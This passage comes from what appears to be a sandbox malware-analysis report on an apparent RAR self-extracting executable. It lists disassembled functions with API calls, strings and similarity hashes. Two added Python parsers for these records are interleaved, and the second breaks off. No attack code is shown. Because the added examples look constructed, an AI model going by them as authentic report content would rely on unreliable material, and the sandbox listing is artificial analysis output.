                                                                                    • GetClassNameW.USER32(00000000,?,00000800), ref: 0016B90C
                                                                                      • Part of subcall function 00160B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0015AC49,?,?,?,0015ABF8,?,-00000002,?,00000000,?), ref: 00160B28
                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0016B92A
                                                                                    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0016B941
                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0016B954
                                                                                      • Part of subcall function 00168B22: GetDC.USER32(00000000), ref: 00168B2E
                                                                                      • Part of subcall function 00168B22: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00168B3D
                                                                                      • Part of subcall function 00168B22: ReleaseDC.USER32(00000000,00000000), ref: 00168B4B
                                                                                      • Part of subcall function 00168ADF: GetDC.USER32(00000000), ref: 00168AEB
                                                                                      • Part of subcall function 00168ADF: GetDeviceCaps.GDI32(00000000,00000058), ref: 00168AFA
                                                                                      • Part of subcall function 00168ADF: ReleaseDC.USER32(00000000,00000000), ref: 00168B08
                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0016B97B
                                                                                    • DeleteObject.GDI32(00000000), ref: 0016B982
                                                                                    • GetWindow.USER32(00000000,00000002), ref: 0016B98B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$CapsDeviceMessageObjectReleaseSend$ClassCompareDeleteLongNameString
                                                                                    • String ID: STATIC
                                                                                    • API String ID: 1444658586-1882779555
                                                                                    • Opcode ID: fe24e95332281cec49bf84d06d721572bace5c0368795da9262d40c8f61496ab
                                                                                    • Instruction ID: daad535e49a8820cd1594f67ed8b7ed9b65df5888af7a5597acad0cb94af205e
                                                                                    • Opcode Fuzzy Hash: fe24e95332281cec49bf84d06d721572bace5c0368795da9262d40c8f61496ab
                                                                                    • Instruction Fuzzy Hash: 0421F3B25446247BEB216B64CC8AFEE762CEF15710F404112FE01E6481CB744E9187B6
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 0017623F
                                                                                      • Part of subcall function 001759C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00179301,?,00000000,?,00000000,?,00179328,?,00000007,?,?,00179725,?), ref: 001759D8
                                                                                      • Part of subcall function 001759C2: GetLastError.KERNEL32(?,?,00179301,?,00000000,?,00000000,?,00179328,?,00000007,?,?,00179725,?,?), ref: 001759EA
                                                                                    • _free.LIBCMT ref: 0017624B
                                                                                    • _free.LIBCMT ref: 00176256
                                                                                    • _free.LIBCMT ref: 00176261
                                                                                    • _free.LIBCMT ref: 0017626C
                                                                                    • _free.LIBCMT ref: 00176277
                                                                                    • _free.LIBCMT ref: 00176282
                                                                                    • _free.LIBCMT ref: 0017628D
                                                                                    • _free.LIBCMT ref: 00176298
                                                                                    • _free.LIBCMT ref: 001762A6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: 64591d7657a85286974c55b2516f9535f983c0fc04ad6136c34d13230eb604c1
                                                                                    • Instruction ID: 010d21c717b631e1658985418cb527621ab27fa46f8b8d49418d4bac8b656eb3
                                                                                    • Opcode Fuzzy Hash: 64591d7657a85286974c55b2516f9535f983c0fc04ad6136c34d13230eb604c1
                                                                                    • Instruction Fuzzy Hash: 5E116675610608EFCF01EF64C942CD93BB6FF14364B5185A5BA8C4B122DB72DA509B40
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ;%u$x%u$xc%u
                                                                                    • API String ID: 0-2277559157
                                                                                    • Opcode ID: 49e5dd78ca48baed67d7c959206d151389630bace68d7b82ac3fc1af351ee75b
                                                                                    • Instruction ID: 7ed66506e7d3f5b9c7341179584e76523e69a33065900ca14f15b2cb161fd5a9
                                                                                    • Opcode Fuzzy Hash: 49e5dd78ca48baed67d7c959206d151389630bace68d7b82ac3fc1af351ee75b
                                                                                    • Instruction Fuzzy Hash: 7AF11A72604340CFDB15EF648895BFA77A5AFA6301F080469FCA59F283D774994CC7A2
                                                                                    APIs
                                                                                      • Part of subcall function 001512E7: GetDlgItem.USER32(00000000,00003021), ref: 0015132B
                                                                                      • Part of subcall function 001512E7: SetWindowTextW.USER32(00000000,001802E4), ref: 00151341
                                                                                    • EndDialog.USER32(?,00000001), ref: 001699AF
                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 001699DC
                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 001699F1
                                                                                    • SetWindowTextW.USER32(?,?), ref: 00169A02
                                                                                    • GetDlgItem.USER32(?,00000065), ref: 00169A0B
                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00169A1F
                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00169A31
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                    • String ID: LICENSEDLG
                                                                                    • API String ID: 3214253823-2177901306
                                                                                    • Opcode ID: 1a618427c344ab9e1faaefe5715b74d39adba02286ea2d872688e988ec899017
                                                                                    • Instruction ID: 419703367c91cd39532dd13a21583142cf7ee734e596179821f9f6bab06824c0
                                                                                    • Opcode Fuzzy Hash: 1a618427c344ab9e1faaefe5715b74d39adba02286ea2d872688e988ec899017
                                                                                    • Instruction Fuzzy Hash: 8E2108322002047FEA116B65ED85E7B3BADEF87B88F014009F600A3890CB769D91D772
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00159232
                                                                                    • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00159255
                                                                                    • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00159274
                                                                                      • Part of subcall function 00160B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0015AC49,?,?,?,0015ABF8,?,-00000002,?,00000000,?), ref: 00160B28
                                                                                    • _swprintf.LIBCMT ref: 00159310
                                                                                      • Part of subcall function 00153F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00153F6E
                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00159385
                                                                                    • MoveFileW.KERNEL32(?,?), ref: 001593C1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                                                                                    • String ID: rtmp%d
                                                                                    • API String ID: 2111052971-3303766350
                                                                                    • Opcode ID: 5d247af51c12682f063138d6e3971d5273676f6ddd3cc8dfab1610a3fc1db9f9
                                                                                    • Instruction ID: 0bfa2bf84da2ea64395a5c3c76ba3cb0f6a64d8b96e1ae55b3ee1b35a40d5fb8
                                                                                    • Opcode Fuzzy Hash: 5d247af51c12682f063138d6e3971d5273676f6ddd3cc8dfab1610a3fc1db9f9
                                                                                    • Instruction Fuzzy Hash: 78417C71911258EADF21ABA08D84EEE777CBF14382F0040A5B915AB042EB309B89CF61
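The per-function records in this listing are the report's flattened rendering of Joe Sandbox's disassembly table: direct API calls, APIs reached through callees ("Part of subcall function"), the memory dump each function was lifted from, and the similarity fields (API ID, String ID, opcode and instruction hashes). The parser below is an added example, not Joe Sandbox code and not part of this report; it turns that rendering into structured records so the API sequences and strings can be queried across the whole listing (for instance, every function that calls MoveFileW next to the "rtmp%d" format string, as the record above does). The record grammar is inferred from the listing itself: a record ends at its "Instruction Fuzzy Hash" line, and the "Download File" text the HTML export glues onto each Associated dump name is stripped. The sample input is a constructed excerpt of two records from this section with most Associated lines trimmed.

```python
"""Parser for the flattened per-function records of a Joe Sandbox disassembly
listing.  Added example, not Joe Sandbox code: the record grammar (a record
ends at its "Instruction Fuzzy Hash" line; "Part of subcall function" lines
are calls made by callees) is inferred from the listing itself."""
import re
from dataclasses import dataclass, field

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity"}

# Matches e.g. "GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00159255",
# "_free.LIBCMT ref: 0017623F" and the "Part of subcall function ADDR: ..." form.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<callee>[0-9A-F]+): )?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Z_0-9]+)"
    r"(?:\((?P<args>.*?)\))?,? ref: (?P<ref>[0-9A-F]+)$")
FIELD_RE = re.compile(r"^(?P<key>[A-Za-z_ ]+?): ?(?P<value>.*)$")


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)      # direct calls: (api, module, args, ref)
    subcalls: list = field(default_factory=list)  # calls reported from callees
    fields: dict = field(default_factory=dict)    # dump provenance + similarity fields
    strings: list = field(default_factory=list)   # String ID split on its '$' separator


def parse_records(text):
    """Split the listing into FunctionRecord objects."""
    records, cur, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            section = line
            continue
        if section == "APIs" and (m := API_RE.match(line)):
            entry = (m["api"], m["module"], m["args"] or "", m["ref"])
            (cur.subcalls if m["callee"] else cur.apis).append(entry)
            continue
        if not (m := FIELD_RE.match(line)):
            continue
        key = m["key"]
        # Drop the "Download File" link text the HTML export glues onto dump names.
        value = m["value"].removesuffix("Download File").strip()
        if key == "Associated":
            cur.fields.setdefault(key, []).append(value)
        else:
            cur.fields[key] = value
        if key == "String ID":
            cur.strings = [s for s in value.split("$") if s]
        if key == "Instruction Fuzzy Hash":  # last field of every record
            records.append(cur)
            cur, section = FunctionRecord(), None
    return records


def find_by_api(records, *apis):
    """Records whose *direct* calls include every named API."""
    want = set(apis)
    return [r for r in records if want <= {a for a, _, _, _ in r.apis}]


# Constructed sample: two records excerpted from the listing above (most
# Associated lines trimmed), including the "Download File" link residue.
SAMPLE = """\
APIs
• EndDialog.USER32(?,00000001), ref: 001699AF
• GetDlgItem.USER32(?,00000065), ref: 00169A0B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
• Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: MessageSend$Item$TextWindow$Dialog
• String ID: LICENSEDLG
• Opcode ID: 1a618427c344ab9e1faaefe5715b74d39adba02286ea2d872688e988ec899017
• Instruction Fuzzy Hash: 8E2108322002047FEA116B65ED85E7B3BADEF87B88F014009F600A3890CB769D91D772
APIs
• __EH_prolog.LIBCMT ref: 00159232
• GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00159255
• GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00159274
  • Part of subcall function 00160B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0015AC49,?,?,?,0015ABF8,?,-00000002,?,00000000,?), ref: 00160B28
• _swprintf.LIBCMT ref: 00159310
• MoveFileW.KERNEL32(?,?), ref: 00159385
• MoveFileW.KERNEL32(?,?), ref: 001593C1
Memory Dump Source
• Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
Similarity
• API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
• String ID: rtmp%d
• Opcode ID: 5d247af51c12682f063138d6e3971d5273676f6ddd3cc8dfab1610a3fc1db9f9
• Instruction Fuzzy Hash: 78417C71911258EADF21ABA08D84EEE777CBF14382F0040A5B915AB042EB309B89CF61
"""

if __name__ == "__main__":
    for rec in find_by_api(parse_records(SAMPLE), "MoveFileW"):
        print(rec.fields["Opcode ID"][:16], rec.strings, sorted({a for a, *_ in rec.apis}))
```

Feed the whole report text to parse_records to get one record per function; find_by_api matches on direct calls only, so a function that only reaches an API through a callee (CompareStringW in the second sample record) is not returned for it, which keeps triage queries such as "who calls MoveFileW" tied to the function that actually issues the call.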
                                                                                    APIs
                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,?,00168705,?), ref: 00167FBA
                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,-00000003,00000000,00000000), ref: 00167FDB
                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 00168002
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
• Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$AllocByteCharCreateMultiStreamWide
                                                                                    • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                    • API String ID: 4094277203-4209811716
                                                                                    • Opcode ID: 95d4a2abe8640a4b5d71478c019322b4ee6744f70e88091f2cd69d4790564d0d
                                                                                    • Instruction ID: d6a72a6843e18a29f64dbd0ac422aa50a621cbffd4459c70ef865024935c9f25
                                                                                    • Opcode Fuzzy Hash: 95d4a2abe8640a4b5d71478c019322b4ee6744f70e88091f2cd69d4790564d0d
                                                                                    • Instruction Fuzzy Hash: 443128321083057FE325AB749C06F6BB7ACDF62324F20854AF514961C1EFB49919C7A6
                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 00167DAF
                                                                                    • GetTickCount.KERNEL32 ref: 00167DCD
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00167DE3
                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00167DF7
                                                                                    • TranslateMessage.USER32(?), ref: 00167E02
                                                                                    • DispatchMessageW.USER32(?), ref: 00167E0D
                                                                                    • ShowWindow.USER32(?,00000005,?,00000000,?,?,?,?,00000000,00000000,00000000,<html>,00000006), ref: 00167EBD
                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00167EC7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
• Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$CountTickWindow$DispatchPeekShowTextTranslate
                                                                                    • String ID:
                                                                                    • API String ID: 4150546248-0
                                                                                    • Opcode ID: bb139a7d0d9e906cf9d4f1c6ceee1b2a42339d00a79e799def71350d511e7972
                                                                                    • Instruction ID: 713beaebb12cbfbe61afa01e53b631db8e53c47e2dee6c47c787c6efc16e1785
                                                                                    • Opcode Fuzzy Hash: bb139a7d0d9e906cf9d4f1c6ceee1b2a42339d00a79e799def71350d511e7972
                                                                                    • Instruction Fuzzy Hash: 2F416971208306AFD714DF65CC8896BBBE9EF48708B00086EF646C7290DB71EC59CB62
                                                                                    APIs
                                                                                    • __aulldiv.LIBCMT ref: 0015FE33
                                                                                      • Part of subcall function 0015A8E0: GetVersionExW.KERNEL32(?), ref: 0015A905
                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 0015FE5C
                                                                                    • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 0015FE6E
                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0015FE7B
                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 0015FE91
                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 0015FE9D
                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0015FED3
                                                                                    • __aullrem.LIBCMT ref: 0015FF5D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
• Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                    • String ID:
                                                                                    • API String ID: 1247370737-0
                                                                                    • Opcode ID: f592e36fc48a1a87c1ee5f39067a59cc2cc8a3c65aee0e0e48b4cb5b938f4e9a
                                                                                    • Instruction ID: 0207369c1f7f85bd6aef4dbadb7b8ebf7efa32bcfe47ef743922e85498aff1c8
                                                                                    • Opcode Fuzzy Hash: f592e36fc48a1a87c1ee5f39067a59cc2cc8a3c65aee0e0e48b4cb5b938f4e9a
                                                                                    • Instruction Fuzzy Hash: D54138B24083099FC310DF65C8809ABF7F8FF88715F004A2EF99696650E735E649DB52
                                                                                    APIs
                                                                                    • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0017CCE2,00000000,00000000,00000000,00000000,00000000,00172C4E), ref: 0017C5AF
                                                                                    • __fassign.LIBCMT ref: 0017C62A
                                                                                    • __fassign.LIBCMT ref: 0017C645
                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0017C66B
                                                                                    • WriteFile.KERNEL32(?,00000000,00000000,0017CCE2,00000000,?,?,?,?,?,?,?,?,?,0017CCE2,00000000), ref: 0017C68A
                                                                                    • WriteFile.KERNEL32(?,00000000,00000001,0017CCE2,00000000,?,?,?,?,?,?,?,?,?,0017CCE2,00000000), ref: 0017C6C3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
• Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 1324828854-0
                                                                                    • Opcode ID: d8f08acab16e8e144ce14f2ba788b16001835578bc0db72f673d2bbc36e5d4ec
                                                                                    • Instruction ID: 35df5b0762a832cbe5743116d83e99e599d0e120ac1b592e06873ffb77beb9de
                                                                                    • Opcode Fuzzy Hash: d8f08acab16e8e144ce14f2ba788b16001835578bc0db72f673d2bbc36e5d4ec
                                                                                    • Instruction Fuzzy Hash: 095191B5A002099FCB14CFA8D885AEEBBF4FF19310F15815EE559E7251E7309A80CFA1
                                                                                    APIs
                                                                                    • GetTempPathW.KERNEL32(00000800,?), ref: 0016B0EF
                                                                                    • _swprintf.LIBCMT ref: 0016B123
                                                                                      • Part of subcall function 00153F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00153F6E
                                                                                    • SetDlgItemTextW.USER32(?,00000066,00193122), ref: 0016B143
                                                                                    • _wcschr.LIBVCRUNTIME ref: 0016B176
                                                                                    • EndDialog.USER32(?,00000001), ref: 0016B257
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
• Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                                                                                    • String ID: %s%s%u
                                                                                    • API String ID: 2892007947-1360425832
                                                                                    • Opcode ID: e6a9bcd1987abd5a381de5ef33fa6a4db8621c3dd5d1524e3eda6ec009a40bae
                                                                                    • Instruction ID: 36b7e858bf1398071db7cc22bc7b020914e5fc81aa8be4d37cc9978ca08c5a6c
                                                                                    • Opcode Fuzzy Hash: e6a9bcd1987abd5a381de5ef33fa6a4db8621c3dd5d1524e3eda6ec009a40bae
                                                                                    • Instruction Fuzzy Hash: 75416C72904219AEEF25DBA4DCC5EEE77BCEB19301F0040A6F919E6051EB709BD48F64
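The per-function summaries above (API calls with `ref:` addresses, subcall lines, and the Similarity fields such as API String ID, Opcode ID and the two fuzzy hashes) are what an analyst pivots on when comparing this sample with other reports. The following is an added example, not Joe Sandbox code and not part of the original report: a small parser that turns the flattened text form of these blocks into records, so the string IDs, imports and hashes can be queried or exported. The sample input is constructed by copying lines from the blocks on this page; the parser assumes the report joins multiple entries in an ID field with `$` (as seen in `Window$Show$RectText` on this page) and that a `Part of subcall function` bullet names the parent routine's address.

```python
"""Parse Joe Sandbox per-function summaries (flattened text form) into records.

Added example; assumptions (not confirmed by the report): multi-value ID fields
are joined with '$', and a bullet starting 'Part of subcall function <addr>:'
names the routine the nested call belongs to.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample input: lines copied from two function blocks on this page.
SAMPLE = """\
APIs
• GetTempPathW.KERNEL32(00000800,?), ref: 0016B0EF
• _swprintf.LIBCMT ref: 0016B123
  • Part of subcall function 00153F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00153F6E
• SetDlgItemTextW.USER32(?,00000066,00193122), ref: 0016B143
• _wcschr.LIBVCRUNTIME ref: 0016B176
• EndDialog.USER32(?,00000001), ref: 0016B257
Strings
Memory Dump Source
• Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_150000_file.jbxd
Similarity
• API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
• String ID: %s%s%u
• API String ID: 2892007947-1360425832
• Opcode ID: e6a9bcd1987abd5a381de5ef33fa6a4db8621c3dd5d1524e3eda6ec009a40bae
• Instruction Fuzzy Hash: 75416C72904219AEEF25DBA4DCC5EEE77BCEB19301F0040A6F919E6051EB709BD48F64
APIs
• ShowWindow.USER32(?,00000000), ref: 001685B5
• GetWindowRect.USER32(?,?), ref: 001685DA
Similarity
• API ID: Window$Show$RectText
• String ID: RarHtmlClassName
• API String ID: 3937224194-1658105358
• Opcode ID: a1d76ef67d135f637f7eb83d65d86e2a991df601f7ea27906728538d9568666c
• Instruction Fuzzy Hash: FA31B032101304AFDB219F64DD88B5BBFA9FF48701F00455AFE09AA592DB70DA50CBA2
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "Name.MODULE(args), ref: ADDR" or "Name.MODULE ref: ADDR" (parens and comma optional)
API_RE = re.compile(r"^(?P<name>[\w$@?]+)\.(?P<module>[\w.]+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
SUBCALL_RE = re.compile(r"^Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*(?P<rest>.*)$")
KV_RE = re.compile(r"^(?P<key>[^:]+?):\s*(?P<val>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: int                       # call-site address, parsed from the hex "ref:"
    subcall_of: Optional[int] = None  # parent routine address for nested calls


@dataclass
class FunctionSummary:
    apis: list[ApiCall] = field(default_factory=list)
    fields: dict[str, str] = field(default_factory=dict)  # Similarity / dump fields

    def strings(self) -> list[str]:
        """String ID entries; assumes '$' is the separator (a literal '$' would split too)."""
        return [s for s in self.fields.get("String ID", "").split("$") if s]


def parse_report(text: str) -> list[FunctionSummary]:
    blocks: list[FunctionSummary] = []
    cur: Optional[FunctionSummary] = None
    section = ""
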